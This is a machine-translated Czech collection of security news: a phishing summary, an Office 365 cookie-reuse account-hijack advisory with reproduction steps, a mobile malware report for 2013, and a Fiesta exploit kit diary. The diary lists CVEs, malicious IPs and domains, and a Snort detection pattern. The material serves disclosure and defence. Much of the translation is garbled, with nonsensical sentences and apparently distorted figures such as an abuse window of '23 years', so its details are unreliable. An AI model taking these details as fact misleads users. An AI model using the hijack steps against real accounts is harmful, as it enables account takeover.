Jak se dalo očekávat, spammeři i nadále posílat "nigerijské" dopisy využívající téma Nelsona Mandely smrti. Tentokrát podvodníci prošel sebe pryč jako manželky nebo asistentů bývalého prezidenta. Ledna také viděl Ariela Šarona smrti použity k oklamat uživatele.
Dalším významnou událostí zneužít podvodníci se olympijské hry v Soči. Hromadné e-maily byly detekovány v lednu reklamách na falešné značkové zboží a doplňky s logem her.
Hodnocení leden organizací zaměřeny nejčastěji phishery viděl malou změnu oproti předchozímu měsíci. Sociálních sítí zůstal na prvním místě s nárůstem o 0,9 procentního bodu. Jsou následuje e-mail a instant messenger, a kategorie vyhledávače, jejichž akcie také mírně vzrostl.
Populární sociálních sítí a instant messenger služby zachovány zůstaly cíle volbou pro falešné oznámení, které obsahují škodlivé programy. V lednu byla škodlivé oznámení provedené vypadají, jako by byly odeslány z WhatsApp cross-platformní messenger pro chytré telefony.
Office 365 - Účet únos Cookie Re-Use Chyba, prodlužuje
1.3.2014 Zranitelnosti
Název:
Office 365 - Účet únos Cookie Re-Use Chyba, rozšířené Prodávající: - Microsoft produkty postižené: - Office 365 E3 balení (verze od 22 února 2014) - SharePoint Online Services Abstrakt: Známý účet únos přes cookie re použití vada byla původně hlášena v červenci 2013 prof Sam Bowne a projednán v několika ? stejně jako původní zranitelnost hasn t Beed uzavřeny této zprávy, je tu další vážný dopad na poražení tuto chybu: - Změna hesla uživatele neruší ukradené cookie - Blokování účtu (uživatel uzamčení) nebude fungovat jako dobře . To umožňuje útočníkovi zneužít uživatelský účet po dobu nejméně 23 let, než byl účet zcela vymazán Kroky pro reprodukci: * Předpoklady: - Office 365 účtu (E3 balíček s Sharepoint Services) - Jak škodlivého systém: Windows O / S Client a Interner Explorer 9 až 11 nebo Firefox 25 + (Jiné operační systémy a prohlížeče dosud nebyly testovány), cookies, nesmí být odstraněny při zavření prohlížeče. - pouze ověřování hesla použít (výchozí) * Příprava kroky: 1) Přihlášení uživatele o použití nedůvěryhodné zařízení (např. internetová kavárna) se office365 přes oficiální Microsoft Online portál login.onmicrosoft.com s nastavením?, aby mi byly podepsány dne? 2) uživatel se dostane k jeho povolených webových stránek týmu na SharePoint Services, např.. replacethiswithyourtestsite.onmicrosoft.com 3) uživatel nyní opustí nedůvěryhodný zařízení buď vypnutím počítače, zavřete prohlížeč nebo jen odhlásili pouze z os, s ), není odhlášení z aplikace Microsoft portálu správně b) a není čistil Cookies * Známá První část - Cookie opětovné použití vada: 4) Uživatel se zlými úmysly (předvečer) lze použít (důvěrné) SharePoint url jednoduše znovu pomocí cookie. 5) Z platného Sharepoint Online Services přístup všechny ostatní služby lze být přístupné (OWA, SkyDrive a tak dále), zatímco osvěžující své pověření cookies, * rozšíření chyba - může t blokování útočník:? 6) Je-li uživatel by mohl být vědomi své poruchy, nebo je detekován zneužití, uživatel se může pokusit změnit své heslo nebo nechat správce resetovat heslo uživatele nebo . 7) Správce může rozhodnout o zablokování účtu od připojení pomocí oac 8) V obou směrech, ukradený cookie bude stále možné přijímat (viz kroky 4 a 5.) Prodávající odezvy: - problém byl ohlášen společnosti Microsoft v několika způsoby: - Ticket 1235308167 (podpora Microsoft USA) - Ticket 201402160322129434 (Microsoft Partner Support Německo) - Ticket 114021011169872 (Microsoft Office Online Uživatelská podpora Německo) - Žádné řešení nabídl tak daleko, ale problém byl uznán by Microsoft Partner německou podporu řešení: -. Z forenzních důvodů by mohlo být to nedoporučuje, ale v té době jsem don t vidět nějaké jiné řešení, jediný způsob, jak je úplně odstranit napadl účtu - Tento způsob je shodný s řešení společnosti Microsoft nabízí jako řešení ve svém internetovém fóru.
Mobilní malware Evolution: 2013
1.3.2014 Analýza | Mobil
Mobilní malware sektor je rychle rostoucí a to jak technologicky a konstrukčně. Je to bezpečné říci, že dnešní cybercriminal již není osamělý hacker, ale součástí vážné hospodářské činnosti.
Existují různé typy subjektů zapojených do mobilního malwaru průmyslu: autoři virů, testery, návrháři rozhraní obou škodlivých aplikací a webových stránek, které jsou distribuovány z, majitelé partnerských programů, které se šíří malware, a majitelé mobilní botnet.
Tato dělba práce mezi zločinci mohou také být viděn v chování jejich trojské koně. V roce 2013, existují důkazy o spolupráci (s největší pravděpodobností na komerční bázi) mezi různými skupinami autory virů. Například, botnet Trojan-SMS.AndroidOS.Opfake.a, kromě své vlastní činnosti, také šířit Backdoor.AndroidOS.Obad.a zasláním spamu obsahující odkaz na malware do seznamu oběti kontaktů.
Nyní je jasné, že zřetelné průmysl vyvinul a je stále více zaměřena na těžebním zisků, což je zřejmé z funkčnosti malware.
2013 v číslech
Bylo zjištěno celkem 143.211 nových úprav škodlivých programů zaměřených na mobilní zařízení ve všech od roku 2013 (od 1.1.2014).
V roce 2013, 3.905.502 instalační balíčky byly využívány zločinci k distribuci mobilního malwaru. Celkově v letech 2012-2013 jsme zjištěna přibližně deset milionů unikátních škodlivých instalačních balíčků:
Počet instalačních balíčků zjištěných v letech 2012-2013
Různé instalační balíčky lze instalovat programy se stejnou funkčností, které se liší pouze z hlediska škodlivého app rozhraní a, například, obsah textových zpráv, které se šíří.
Android je stále terčem zákeřných útoků. 98,05% všech malware detekovaného v roce 2013 zaměřena tuto platformu, což potvrzuje i popularitu tohoto mobilního operačního systému a zranitelnost jeho architektuře.
Distribuce mobilního malware zjištěn v roce 2013 podle platformy
Většina mobilní malware je navržen tak, aby ukrást peníze uživatelů, včetně SMS trojské koně, a spoustou zadních vrátek a trojských koní.
Distribuce mobilního malwaru podle kategorie
V průběhu roku se počet mobilních malware úprav určených pro phishing, krádež informací o kreditních kartách a peníze se zvýšila o faktor 19,7. V roce 2013, mobilní produkty společnosti Kaspersky Lab zabráněno 2500 napadením bankovních trojských koní.
Metody a postupy
2013 došlo nejen radikální nárůst výkonu z mobilního autoři virů, ale také viděl, je aktivně uplatňovat metody a technologie, které dovolily zločinci efektivněji využívat jejich malware. Tam bylo několik různých oblastí, kde mobilní malware podstoupili zálohy.
Distribuce
Počítačoví zločinci využili některých mimořádně sofistikovaných metod infikovat mobilní zařízení.
Infikovat právní webové zdroje napomáhá šíření mobilního malwaru prostřednictvím populárních webových stránkách. Stále více a více chytrých telefonů a tabletů majitelé využívat své zařízení k přístupu na internetové stránky, si neuvědomuje, že i většina renomovaných zdrojů může být počítačový pirát. Podle našich údajů, 0,4% z navštívených webových stránek uživateli našich výrobků byly ohroženy stránky.
Distribuce prostřednictvím alternativních app obchodech . V Asii existuje řada společností, které vyrábějí Android-založené zařízení a Android aplikací, a mnoho z nich nabízí uživatelům vlastní app obchody, které obsahují programy, které nelze nalézt v Google Play. Čistě nominální kontrolu nad aplikací nahraných na těchto prodejnách znamená, že útočníci mohou skrývat trojské koně v aplikacích vypadat jako nevinné hry nebo utility.
Distribuce prostřednictvím botnetů. Zpravidla bots self-množit zasláním textové zprávy s nebezpečným odkazem na adresy v adresáři oběti. Jsme také registrována jednu epizodu mobilní malware šíří prostřednictvím třetí strany botnet.
Odolnost na ochranu proti malware
Schopnost škodlivého softwaru neustále pracovat na mobilním zařízení oběti je důležitým aspektem jejího vývoje. Čím déle Trojan "žije" na telefonu, tím více peněz to bude pro majitele. To je oblast, kde autoři virů se aktivně pracuje, což má za následek velké množství technologických inovací.
Zločinci jsou stále více využívají mlžení , záměrné jednání o vytvoření komplexní kód, aby je obtížné je analyzovat. Čím složitější je zmatek, tím déle bude trvat antivirové řešení pro neutralizaci škodlivého kódu. Výmluvné je, aktuální spisovatelé virů zvládli komerční obfuskátory. To znamená, že vynaložily značné investice. Například, jeden komerční obfuscator, která stála 350 €, byl použit pro trojské koně a Opfak.bo Obad.a
Android zranitelnosti jsou využívány zločinci ze tří hlavních důvodů: aby se vyhnula kód kontrolu integrity při instalaci aplikace (zranitelnost Master Key), s cílem posílit práva škodlivých aplikací, značně rozšiřují své schopnosti, a aby to více obtížný pro odstranění škodlivého softwaru. Například, Svpeng využívá dosud neznámou zranitelnost se chránit před ručně odstranit nebo antivirového programu.
Počítačoví zločinci také zneužít tuto chybu zabezpečení hlavního klíče a naučili vložit nepodepsané spustitelné soubory v Android instalačních balíčků. Digitální ověření podpisu lze obejít tím, že soubor škodlivý přesně stejný název jako legitimní soubor a umístit jej na stejné úrovni v archivu. Systém ověřuje podpis oprávněného souboru při instalaci souboru škodlivého.
Bohužel, je specifickým rysem Android zabezpečení, které znamená, že je možné pouze se jich zbavit tím, že obdrží aktualizace od výrobce zařízení. Nicméně, mnoho uživatelů se v žádném spěchu aktualizovat operační systémy svých výrobků. Pokud smartphone nebo tablet byla vydána před více než rokem, je to pravděpodobně již není podporován výrobcem a záplatování zranitelností již není k dispozici. V tomto případě, pouze pomoc přichází z antivirové řešení, například Kaspersky Internet Security pro Android.
Vkládání škodlivého kódu do legitimních programů pomáhá zakrýt infekce z oběti. Samozřejmě, že to neznamená, že digitální podpis vývojáře softwaru mohou být použity. Nicméně, vzhledem k neexistenci certifikačních středisek, které ověřují digitální podpisy programy Android, nic nebrání tomu, zločince od přidání vlastního podpisu. Jako výsledek, kopie Angry Birds instalovaných z neoficiálních app store nebo stažených z fóra může snadno obsahovat škodlivý funkčnost.
Možnosti a funkce
V roce 2013, jsme zjistili několik technologických inovací vyvinula a zločinci používají v jejich škodlivého softwaru. Níže jsou uvedeny popisy některých z nejzajímavějších.
Řízení malware z jednoho centra poskytuje maximální flexibilitu. Botnet může výrazně více peněz, než autonomních trojské koně. To přijde jako žádné překvapení, pak, že mnoho SMS-Trojské koně patří funkčnost bot. Podle našich odhadů asi 60% z mobilního malwaru jsou prvky obou velkých a malých mobilních robotických sítí.
Pomocí Google Cloud Zprávy majitelé botnet může pracovat bez serveru C & C, čímž se eliminuje hrozba botnet je detekován a blokován donucovacími orgány. Google Cloud Messaging je navržen tak, aby odeslat krátkou zprávu (do 4 KB) do mobilních zařízení prostřednictvím služby Google. Developer prostě musí zaregistrovat a získat jedinečné ID pro jeho aplikace. Příkazy přijaté přes GCM nelze okamžitě zablokován na infikované zařízení.
Zjistili jsme několik škodlivých programů pomocí GCM pro velení a řízení - rozšířené Trojan-SMS.AndroidOS.FakeInst.a, Trojan-SMS.AndroidOS.Agent.ao, a Trojan-SMS.AndroidOS.OpFake.a mezi ostatními. Google je aktivně bojovat proti tomuto užívání služby, rychle reagovat na zprávy z antivirových společností a blokování identifikátory zločinci.
Útoky na systému Windows XP umožňují mobilní malware infikovat počítač po připojení smartphonu nebo tabletu. Na začátku roku 2013 jsme zjištěny dva stejné aplikace na Google Play, které byly údajně určeny pro čištění operačního systému zařízení se systémem Android od zbytečných procesů. Ve skutečnosti, že aplikace jsou navrženy tak, aby stažení souboru autorun.inf, ikonu souboru a soubor Win32 Trojan, který mobilní škodlivý program vyhledá v kořenovém adresáři SD karty. Na připojení smartphonu v režimu USB disku emulace k počítači se systémem Windows XP, systém automaticky spustí Trojan (pokud AutoPlay na externí médium není zakázán) a je nakažený. Trojan umožňuje zločinci na dálku ovládat počítač oběti a je schopen nahrávat zvuk z mikrofonu. Chtěli bychom zdůraznit, že tento způsob útoku funguje pouze na Windows XP a Android verze před 2.2.
Nejvyspělejší mobilní škodlivé programy jsou dnes trojské koně zaměřené na bankovní účty uživatelů - nejatraktivnější zdroj trestních výdělku.
Trend z roku: mobilní bankovnictví trojské koně
2013 byl poznamenán rychlým nárůstem počtu Android bankovních trojských koní. Cyber průmysl mobilního malwaru je stále více zaměřena na zefektivnění zisku, tj. mobilní phishing, krádež informací o kreditních kartách, převody peněz z bankovních karet do mobilních telefonů a od telefonů na e-peněženek zločinců. Počítačoví zločinci se stali posedlí touto metodou nelegálních příjmů: na začátku roku jsme věděli, že pouze 67 bankovních trojských koní, ale do konce roku to již bylo 1321 unikátních vzorků. Mobilních produktů společnosti Kaspersky Lab zabránit 2.500 infekcí bankovní trojské koně.
Počet mobilních bankovních trojských koní v naší sbírce
Mobilní bankovnictví trojské koně může běžet spolu s Win-32 trojské koně, aby se vyhnula dvoufaktorovou autentizaci - MTAN odcizení (krádež ověřování bankovní kódy, které banky posílají své zákazníky SMS zpráv). Nicméně, v roce 2013, autonomní mobilní bankovnictví trojské koně dále rozvíjet. V současné době jsou tyto trojské koně útoku omezeného počtu klientů bank, ale očekává se, že zločinci budou vymýšlet nové techniky, které jim umožní rozšířit počet a geografii potenciálních obětí.
Infekce způsobené mobilních bankovních programů
Dnes, většina bankovních trojských útoků vliv na uživatele v Rusku a Společenství nezávislých států. Nicméně, tato situace nebude trvat dlouho: vzhledem zájem počítačovými zloději "v uživatelských účtech, činnost mobilních bankovních trojských koní se očekává, že růst v jiných zemích v roce 2014.
Jak bylo uvedeno výše, bankovní trojské koně jsou snad nejsložitější ze všech mobilních hrozeb, a Svpeng je jedním z nejvýraznějších příkladů.
Svpeng
V polovině července jsme zjistili Trojan-SMS.AndroidOS.Svpeng.a, který na rozdíl od svých protějšků SMS trojské koně, je zaměřen na krádeže peněz z bankovního účtu oběti, spíše než z jeho mobilního telefonu. To nemůže jednat samostatně a pracuje přísně v souladu s příkazy obdržel od serveru C & C. Tento škodlivý program se šíří přes SMS spamu a od napadených legitimních stránek, které přesměrovávají mobilním uživatelům se zlými úmysly zdroj. Tam je uživatel vyzván ke stažení a instalaci Trojan napodobujícím aktualizaci Adobe Flash Player.
Svpeng je schopen dělat spoustu věcí.
Shromažďuje informace o telefonu (IMEI, země, poskytovatele služeb, jazyk operačního systému) a odešle ji do počítače prostřednictvím požadavku HTTP POST. To se zdá být nutné určit počet bank, oběť může používat. Svpeng je pouze v současné době útočí na klienty ruských bank. Typicky, nicméně, zločinci první test-run technologii na ruském sektoru na internetu a pak se vrátit na to globálně, útočí na uživatele v jiných zemích.
To krade SMS zpráv a informace o hlasových hovorů. Pomáhá útočník zjistit, které banky vlastníkem smartphone volání - Trojan obdrží seznam telefonních čísel bankovních z jeho C & C serveru.
To krade peníze z bankovního účtu oběti. V Rusku, některé velké banky nabízejí svým klientům speciální službu, která jim umožňuje převést peníze ze svého bankovního karty na jejich mobilní telefonní účet. Zákazníci mají poslat nastavenou textovou zprávu ze svého telefonu na určitý počet bank. Svpeng odešle příslušné zprávy SMS služeb obou bank. Svpeng dělá to pro kontrolu, zda jsou karty z těchto bank jsou připojeny k počtu infikovaných telefonu a zjistit zůstatek na účtu. Je-li telefon připojen k bankovní kartě, příkazy jsou odesílány ze serveru C & C s pokyny k převodu peněz z účtu uživatele na jeho / její mobilní účtu. Mezi zločinci pak odeslat peníze na digitální peněženky nebo na číslo prémie a peníze ji dovnitř
To krade přihlašovací jména a hesla do on-line bankovní účty nahrazením okno zobrazené bankovní aplikace. V současné době, to se týká pouze ruské banky, ale technologie za Svpeng může být snadno použit pro cílové jiných bankovních aplikací.
To krade údaje o bankovním karty (číslo, datum platnosti, CVC2/CVV2) napodobuje proces registraci bankovní kartu s Google Play. Pokud uživatel zahájila Play trhu, Trojan zachycuje události a zobrazí se okno v horní části okna Google Play, vyzve uživatele k zadání jeho / její platební kartě ve falešné okně. Údaje uvedené uživatelem je zaslána zločinci.
Je vymáhá peníze od uživatelů tím, že hrozí zablokovat smartphone: zobrazí zprávu požadující $ 500 odblokovat. Ve skutečnosti, Trojan neblokuje nic a telefon může být použit bez jakýchkoliv problémů.
To h Ides stopy své činnosti zakrývat odchozí a příchozí textové zprávy a blokování hovorů a zpráv z čísla, které patří do banky. Trojan dostane seznam bankovních telefonních čísel z jeho C & C serveru.
Je p rotects se od vypuštění vyžádáním práva správce zařízení během instalace. Jako výsledek, Trojan tlačítko smazat v seznamu aplikací se stane neaktivní, což může způsobit problémy pro nezkušené uživatele. Je nemožné, aby ho zbavit těchto práv bez použití speciálních nástrojů (jako je Kaspersky Internet Security pro Android). Chcete-li chránit sebe před přemístěním, Svpeng využívá dosud neznámou zranitelnost v Android. To používá stejný trik, aby se zabránilo smartphone od vracené do továrního nastavení.
Trojan je distribuován v Rusku a zemích SNS. Ale, jak jsme již zmínili, že zločinci mohli snadno obrátit svou pozornost k uživatelům v jiných zemích.
Perkele a Wroba
Zahraniční uživatelé také byli na přijímacím konci roku více škodlivých inovací zaměřených na bankovní účty.
Perkele Android Trojan nejen útoky ruských uživatelů, ale také klientům z několika evropských bank. Je zajímavé především proto, že funguje ve spojení s různými bankovními Win32 trojské koně. Jeho hlavním úkolem je, aby se vyhnula dvoufaktorovou autentizaci klienta v on-line bankovního systému.
Vzhledem ke specifické povaze své činnosti, Perkele je distribuován v poněkud neobvyklým způsobem. Když uživatel zadá bankovní internetové stránce na počítač napaden bankovní malware (Zeus, Citadela), žádost o počtu smartphone a typ operačního systému, je vstříknut do kódu přihlašovací stránku. Tato data jsou okamžitě zaslán zločinci a počítač zobrazí QR kód s odkazem na údajné certifikátu on-line bankovního systému. Po naskenování QR kód a instalaci komponenty stáhnout z odkazu, uživatel infikuje svůj smartphone s Trojan program, který se může pochlubit funkcí, které je velký zájem útočníků.
Perkele zachycuje mTANs (potvrzení kódy bankovních operací) zaslané bankou prostřednictvím textové zprávy. Pomocí přihlašovací jméno a heslo, ukradené z prohlížeče, Windows Trojan spustí falešnou transakci, zatímco Perkele zachytí (prostřednictvím serveru C & C) MTAN poslal bankou pro uživatele. Peníze pak zmizí z účtu oběti a inkasoval bez vědomí majitele.
Korejský malware Wroba, kromě tradičních vektoru infekce přes soubor-sdílení služeb, se šíří přes alternativní app obchodech. Jakmile se infikuje zařízení, Wroba se chová velmi agresivně. Hledá pro mobilní bankovní aplikace, odstraní je a obrázky padělané verze. Z vnější strany, které jsou k nerozeznání od legitimních aplikací. Nicméně, oni mají žádné bankovní funkce, a jen krást jména a hesla zadaných uživatelem.
TOP 10 mobilní hrozby zjištěné v roce 2013
Jméno * % Ze všech útoků
1 DangerousObject.Multi.Generic 40.42%
2 Trojan-SMS.AndroidOS.OpFake.bo 21.77%
3 AdWare.AndroidOS.Ganlet.a 12.40%
4 Trojan-SMS.AndroidOS.FakeInst.a 10.37%
5 RiskTool.AndroidOS.SMSreg.cw 8.80%
6 Trojan-SMS.AndroidOS.Agent.u 8,03%
7 Trojan-SMS.AndroidOS.OpFake.a 5,49%
8 Trojan.AndroidOS.Plangton.a 5,37%
9 Trojan.AndroidOS.MTK.a 4,25%
10 AdWare.AndroidOS.Hamob.a 3,39%
1.. DangerousObject.Multi.Generic. Tento rozsudek znamená, že jsme si vědomi škodlivého charakteru dané aplikace, ale pro toho či onoho důvodu nejsou poskytovány našim uživatelům s podpisy detekovat. V takových případech, detekce je k dispozici prostřednictvím cloudových technologií realizovaných společností v Security Network Kaspersky, které umožňují naše výrobky minimalizovat čas potřebný k reakci na nové a neznámé hrozby.
2. Trojan-SMS.AndroidOS.OpFake.bo. To je jeden z nejvíce sofistikovaných SMS trojské koně. Jeho charakteristické znaky jsou dobře navržené rozhraní a chamtivost jeho vývojářů. Po spuštění se krade peníze z majitele mobilního zařízení - od $ 9 k celé částky na účet uživatele. Je zde také riziko, telefonní číslo uživatele je zdiskreditovaný, protože Trojan může sbírat čísla ze seznamu kontaktů a SMS do všech těchto čísel. V malware se zaměřuje především rusko-reproduktory a uživatelů v zemích SNS.
3. AdWare.AndroidOS.Ganlet.a. reklamní modul, který má funkce potřebné pro instalaci dalších aplikací.
4. Trojan-SMS.AndroidOS.FakeInst.a. Tento malware se vyvíjel v průběhu posledních dvou let od jednoduchého SMS Trojan do plně funkčního robota řízeného prostřednictvím různých kanálů (včetně Google Cloud Messaging). Trojan může ukrást peníze z účtu uživatele a odesílat zprávy na čísla v seznamu kontaktů oběti.
5. RiskTool.AndroidOS.SMSreg.cw. Tento platební modul je rozšířený v Číně. To je zahrnuta v různých hrách jako modul pro vytváření on-line nákupy prostřednictvím SMS v rámci aplikace. Odstraňuje textové zprávy s potvrzením od zúčtovacího systému bez vědomí uživatele. Oběti nemám ponětí, peníze byly ukradeny ze svého mobilního telefonu, dokud se zkontrolovat stav.
6.. Trojan-SMS.AndroidOS.Agent.u. Jednalo se o první Trojan používat zranitelnost v OS Android pro získání ZAŘÍZENÍ oprávnění správce, čímž její odstranění velmi obtížný úkol. Kromě toho, že je schopen odmítnout příchozí hovory a volat na jeho vlastní. Možné poškození: odesílání více SMS zpráv s náklady v celkové výši 9 nebo více.
7. Trojan.AndroidOS.Plangton.a. Tento reklamní modul odešle osobní údaje uživatele (bez jejich vědomí) k reklamním serveru, aby to vypadalo jako cílené reklamní kampaně. Výsledná škoda zahrnuje číslo mobilního telefonu uživatele, účtu Google a některé další data jsou diskreditaci. Tento Trojan také libovolně mění domovskou stránku prohlížeče a dodává reklamní záložky.
8. . Trojan-SMS.AndroidOS.OpFake.a Tento multifunkční bot pomáhá distribuovat sofistikované Android malware Backdoor.AndroidOS.Obad.a. složen z těchto dvou je extrémně nebezpečný, protože jeho:
Široká škála možností: krádež identity, posílání textových zpráv na jakékoli číslo. Instalace aplikace, jako by to mohlo vést ke všem peněz, ukradené z mobilního účtu. To může také vyústit v dotčeném telefonní číslo je zdiskreditované po kontaktní čísla ukradené z účtu se používají k posílání textových zpráv. Seznam kontaktů bude také odeslat na server zločince.
extrémně komplexní sebeobranné mechanismy a protiopatření, které brání odstranění. Vzhledem k využití na Android zranitelnosti, to Trojan nelze odstranit bez speciálního programu, jako je KIS pro Android.
Je třeba poznamenat, že Trojan-SMS.AndroidOS.OpFake.a je rozložena na větší geografickou oblast než ostatní Top 10 vůdců. Často se zaregistrovat pokusy infikovat zařízení, a to nejen v zemích SNS, ale také v Evropě.
9. Trojan.AndroidOS.MTK.a. Jedná se o sofistikovaný Trojan program s širokou funkčnost a sofistikovaných metod šifrování přenosu. Jeho hlavním úkolem je spustit nebezpečné aplikace, které byly staženy do infikovaného zařízení.
10. AdWare.AndroidOS.Hamob.a je reklamní aplikace napodobovat legitimní programy (pomocí názvu a ikony, např. WinRAR), zatímco jeho jedinou funkcí je zobrazení reklamy.
Top 10 zahrnuje čtyři SMS trojské koně, i když některé z nich mají kontrolní mechanismy, které přeměňují infikované zařízení do roboty.
Geografie hrozeb
Země, kde se uživatelé setkávají největší riziko mobilního malware
(procento všech napadených unikátních uživatelů)
Top 10 zemí podle počtu napadených unikátních uživatelů:
Země % Ze všech napadených unikátních uživatelů
1 Rusko 40.34%
2 Indie 7,90%
3 Vietnam 3,96%
4 Ukrajina 3,84%
5 Spojené království 3,42%
6 Německo 3,20%
7 Kazachstán 2,88%
8 Spojené státy americké 2.13%
9 Malajsie 2.12%
10 Írán 2,01%
Mobilní hrozby mají vlastnosti specifické pro tento region - útočníci používají různé kategorie mobilního malwaru v závislosti na regionu nebo zemi. Níže je uvedeno několik příkladů distribuci mobilního malwaru podle země.
Rusko
V Rusku, mobilní počítačová kriminalita je zvláště převládající - 40,3% ze všech uživatelů zaútočili na celém světě v roce 2013 se nachází v této zemi.
Top 5 rodin z mobilního malware distribuovaných v Rusku
Rodina % Ze všech napadených unikátních uživatelů
Trojan-SMS.AndroidOS.OpFake 40.19%
Trojan-SMS.AndroidOS.FakeInst 28.57%
Trojan-SMS.AndroidOS.Agent 27.11%
DangerousObject.Multi.Generic 25.30%
Trojan-SMS.AndroidOS.Stealer 15.98%
V roce 2013 Rusko opět vedl v počtu infekcí SMS Trojan a v současné době žádné známky toho, že se situace zlepší. Jak již bylo uvedeno výše, většina mobilních bankovních trojských koní zaměřit ruské uživatele.
Rusko a země SNS často slouží jako zkušební terén pro nové technologie: když zdokonalil své technologie v ruské jazykové oblasti internetu, se zločinci pak obrátit svou pozornost k uživatelům v jiných zemích.
Německo
Německo je jednou ze zemí západní Evropy, kde SMS trojské koně jsou velmi aktivní. V roce 2013 byla Evropa jasně cíl pro ruské autory virů, protože jejich zpeněžení podvody zahrnující textové zprávy odesílané na prémiová čísla funguje dobře v tomto regionu. V Německu jsme zaznamenali neustálé pokusy o SMS Trojan infekce, zejména Agent malware rodiny.
Mobilní bankovní trojské koně jsou také aktivně používá v této zemi: Německo zaujímá první místo mezi západoevropských zemí podle počtu unikátních uživatelů napadených (6. místo ve světovém hodnocení).
Top 5 rodin z mobilního malwaru distribuován v Německu
Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 25.88%
DangerousObject.Multi.Generic 20.83%
Trojan-SMS.AndroidOS.Agent 9,25%
Trojan.AndroidOS.MTK 8,58%
AdWare.AndroidOS.Ganlet 5,92%
USA
Situace v USA je jiný. Nejsou žádné zpeněžení podvody týkající textových zpráv, což znamená, že není jasné dominance mobilních SMS trojské koně. Vůdci jsou roboty sběr dat o infikovaných smartphony.
Top 5 rodin z mobilního malware distribuovaných v USA
Rodina % Ze všech napadených unikátních uživatelů
DangerousObject.Multi.Generic 19.75%
RiskTool.AndroidOS.SMSreg 19.24%
Monitor.AndroidOS.Walien 11.24%
Backdoor.AndroidOS.GinMaster 8,05%
AdWare.AndroidOS.Ganlet 7,29%
Čína
V Číně existuje mnoho reklamních modulů integrovaných do čistých a dokonce i škodlivé aplikace. Funkce reklamních modulů jsou různorodé, dokonce jít tak daleko, jak stahování škodlivého softwaru telefonu oběti. SMS trojské koně a zadní vrátka jsou také velmi populární v Číně.
Top 5 rodin z mobilního malware distribuovaných v Číně
Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 46.43%
AdWare.AndroidOS.Dowgin 19.18%
DangerousObject.Multi.Generic 13.89%
Trojan-SMS.AndroidOS.Agent 10.55%
Trojan.AndroidOS.MTK 10.13%
Závěr
Škodlivý software, který útočí na uživatele mobilních bankovních účtů se stále vyvíjí a počet programů, rychle roste. Je zřejmé, že tento trend bude pokračovat, s více mobilních bankovních trojských koní a nových technologií, aby se zabránilo detekci a odstranění.
Ze všech mobilních vzorků malwaru zjištěných v roce 2013, boty byly nejpočetnější kategorií. Útočníci jsou jasně vidět výhody mobilních robotických sítí, pokud jde o vytváření zisku. Nové mechanismy pro řízení mobilních botnetů se mohou objevit v blízké budoucnosti.
V roce 2014 očekáváme zranitelnosti ve všech typech aktivně využívaných dát malware root přístup k zařízení, takže odstranění ještě obtížnější.
2013 viděl poprvé zaregistrován malware útok na počítače spouští z mobilního zařízení. Počasí jsme budoucích Wi-Fi útoky z mobilních zařízení na sousedních stanic a širší infrastruktuře.
SMS trojské koně jsou pravděpodobně zůstanou mezi mobilními malware vůdců a dokonce dobýt nové území.
Fiesta
1.3.2014 Bezpečnost
Ne, my jsme vypukla na pivo nebo se rozhodli začít o víkendu brzy. Tento deník ISC není načase strany, ale spíše o "Fiesta Exploit Kit". Jsme v poslední době svědky uptick jejího použití na nedůvěryhodné weby.
Fiesta byl asi v té či oné podobě od roku 2012, kdy se oddělil soupravy "NeoSploit", a pravidelně se dovybavit novými využije zůstat efektivní. V první fázi je obvykle jen přesměrování, na skutečné využití místa, odkud se dostane silně zakódovaný / popletl soubor JavaScript stáhli. Tento soubor JavaScript kontroluje lokálně nainstalovaného softwaru, a pak se spustí nebo stáhne odpovídající exploit (s).
V současné době nejrozšířenější verze Fiesta Zdá se, že používat stejné pěti hrdinských činech / zranitelná, protože o listopadu loňského roku:
CVE-2010-0188 Adobe Reader TIFF zranitelnost. Kontroly kód pro Adobe Reader verze> = 800 <821 a> = 900 <931, a to pouze vyvolává pokud je nainstalován odpovídající (starověký) Adobe verze.
CVE-2013-0074 Microsoft Silverlight (MS13-022, březen 2013),. Kontroly kód pro Silverlight verze> = 4050401 a <5120125, a spouští případně využít. Silverlight 5.1.201.25.0 je verze poté, co byla použita oprava MS13-022
CVE-2013-2465 Oracle Java. Samozřejmě - tam musel být Java sploit v mixu. Kontroly kód pro Java> 630 <722
CVE-2013-0634 Adobe Flash Player. Kontroly kódu pro Flash Player> = 110000 <= 115502.
CVE-2013-2551 Microsoft Internet Explorer (MS13-037, květen 2013),. Kód v tomto případě jen kontroluje pro IE verze 6 do 10, a pokud je nalezen, pokusí zneužít.
Systém se přiměřeně aktuální patche by měly mít čeho bát od shora. Skutečnost, že Fiesta nebyl široce re-obrobený na novější využije naznačuje, že i když výše sada zranitelnosti stále síťoviny padouchy spoustu nově využívaných roboty.
Stávající podpisy Snort EmergingThreat pro Fiesta dělají rozumnou práci na špinění útok. Pokud jde o standardní Snort (VRT) ruleset, pravidlo SID 29443 vypadá dobře teď funguje, byla přidána v lednu, aby odpovídal na formátu URL:? "/ ^ \ / [A-z0-9] + \ / \ [ 0-9a-f] {60,66} [\ x3b \ X2C \ d] * $ / U "používá, a je stále spouštění často na aktuální Fiesta vlny.
Jedna Další charakteristikou současné Fiesta je také jeho těžké použití dynamického DNS. Viděno v tomto týdnu doposud byli *. no-ip.info, *. no-ip.org, *. myvnc.com, *. no-ip.biz, *. myftp.com, *. hopto.org a *. serveblog.net . Jedná se o poskytovatele DynDNS, tak samozřejmě ne všechny stránky hostované tam jsou škodlivé. Ale Fiesta dělá rozsáhlé užití těchto služeb se rychle zamíchat své využívají doručení hostitele. Názvy hostitele použité jsou náhodné znaky sekvence 10 nebo 6 znaků, aktuální například " ofuuttfmhz.hopto.org ". Odpovídající stránky jsou často aktivní méně než hodinu před názvem DNS používané v sploits změn znovu.
Co se zdá být poměrně statické, jsou IP adresy - 209.239.113.39 a 64.202.116.124 oba byly použity v posledních dvou týdnech a druhý hoster se zdá být obzvláště "populární", protože sousední adresy (64.202.116.122, 64,202 .116.125) byly v použití Fiesta na konci ledna. Také docela běžné, jsou vstupní stránky hostované na *. in.ua (Ukrajina) domény, jako ujimmy.in.ua, aloduq.in.ua , atd. Tyto oblasti by měly být dostatečně časté v (západních) protokoly webového serveru proxy, aby se jim lépe na místě.
Máte-li jakékoli další aktuální Fiesta Intel (nezahrnující Cerveza :), dejte nám vědět přes kontaktní stránku nebo komentářů pod!
Qualys CEO dodat keynote na konferenci RSA 2014
28.2.2014 Bezpečnost
